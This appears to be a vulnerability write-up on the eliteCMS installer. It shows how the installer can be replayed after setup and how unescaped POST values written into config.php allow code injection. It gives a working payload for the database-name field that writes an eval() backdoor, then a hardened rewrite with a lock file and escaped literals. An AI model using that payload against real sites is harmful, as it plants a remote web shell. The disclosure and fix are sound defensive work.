eliteCMS's installer is not locked after installation completes, so an attacker can revisit the installer URL and re-run the installation.

A second vulnerability: the installer can write a one-line PHP backdoor straight into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated into PHP source with no escaping or validation
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written verbatim to config.php
    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the POST request without any validation.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the quoted define() string is closed early and a one-line backdoor is written into /admin/includes/config.php.
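As an added example (not eliteCMS code), here is how the step-4 config writer could be rewritten so that both problems described above are closed: the installer refuses to run once a lock file exists, identifiers are validated against a conservative character set, and every value is emitted with var_export() so that it can only ever become a PHP string literal. The lock-file path, the helper names and the use of $_POST directly as the settings array are assumptions made for this example; with the payload quoted in the post, the generated line becomes define('DB_NAME', '"?><?php eval($_POST[c]);?><?php'); which is inert data, not code.

```php
<?php
// Added example, not part of eliteCMS: a hardened installer step that
// (1) cannot be replayed after installation and (2) cannot be tricked into
// writing attacker-controlled PHP source into config.php.
// INSTALL_LOCK and CONFIG_FILE paths are assumptions for this example.

define('INSTALL_LOCK', __DIR__ . '/install.lock');
define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');

// Once installation has completed the lock file exists and every later
// request to the installer is refused.
function installer_is_locked(): bool
{
    return file_exists(INSTALL_LOCK);
}

// Host, database and user names never legitimately contain quotes, "?>",
// newlines or other characters that matter to the PHP parser, so reject
// anything outside a conservative allow-list up front (defence in depth;
// php_literal() below is what actually makes the output safe).
function validate_identifier(string $value, int $maxLen = 64): string
{
    if ($value === '' || strlen($value) > $maxLen
        || !preg_match('/^[A-Za-z0-9_.:\-]+$/', $value)) {
        throw new InvalidArgumentException('invalid database setting');
    }
    return $value;
}

// Passwords may contain any byte, so instead of restricting them we let
// var_export() produce a properly escaped single-quoted PHP literal. A value
// can therefore never close the string, the define() call or the PHP tag.
function php_literal(string $value): string
{
    return var_export($value, true);
}

// Assemble config.php from validated, literal-quoted settings. Deliberately
// no closing "?>" tag: nothing after the defines can be treated as output.
function build_config(array $settings): string
{
    $server = validate_identifier((string)($settings['DB_SERVER'] ?? ''), 255);
    $name   = validate_identifier((string)($settings['DB_NAME'] ?? ''));
    $user   = validate_identifier((string)($settings['DB_USER'] ?? ''));
    $pass   = (string)($settings['DB_PASS'] ?? '');

    $out  = "<?php\n";
    $out .= "// Generated by the installer; do not edit by hand.\n";
    $out .= "define('DB_SERVER', " . php_literal($server) . ");\n";
    $out .= "define('DB_NAME', "   . php_literal($name)   . ");\n";
    $out .= "define('DB_USER', "   . php_literal($user)   . ");\n";
    $out .= "define('DB_PASS', "   . php_literal($pass)   . ");\n";
    return $out;
}

// Entry point for installer step 4.
function write_config(array $settings): void
{
    if (installer_is_locked()) {
        http_response_code(403);
        exit('Installer is locked; remove the install directory.');
    }
    $config = build_config($settings);
    if (file_put_contents(CONFIG_FILE, $config, LOCK_EX) === false) {
        throw new RuntimeException('could not write config.php');
    }
    // Lock the installer so this step cannot be run a second time.
    file_put_contents(INSTALL_LOCK, date('c') . "\n", LOCK_EX);
}

// Usage at step 4 (settings would come from the validated session/POST data):
// write_config($_POST);
```

When reviewing a deployment, the two things to check are that the install directory or lock file actually prevents a second run (fetch the installer URL after setup and expect a refusal), and that config.php contains only quoted literals, which a quick `php -l admin/includes/config.php` plus a visual scan for a second `<?php` will confirm.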